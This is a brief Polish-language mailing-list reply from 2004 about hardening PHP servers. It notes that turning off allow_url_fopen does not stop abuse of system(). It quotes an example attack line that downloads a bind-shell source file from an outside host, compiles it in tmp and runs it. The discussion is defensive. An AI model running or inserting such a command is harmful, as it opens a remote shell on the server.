On Wed, Feb 18, 2004 at 12:45:05PM +0100, Tomasz T. Ciaszczyk wrote: > system("cd tmp;wget http://www.rootshell.com/bindshell.c;gcc bindshell.c;./a.out"); ... > - zablokowanie fopena na zewnatrz w php (allow_url_fopen = Off) To dobry pomysl, ale nie chroni przed tym, o czym sam wspomniales, czyli uzyciem system(), jesli taka mozliwosc istnieje. -- _.|._ |_ _. : Adam Byrtek /alpha alpha@debian.org (_|||_)| |(_| : pgp 0xB25952C0 |
Attachment:
signature.asc
Description: Digital signature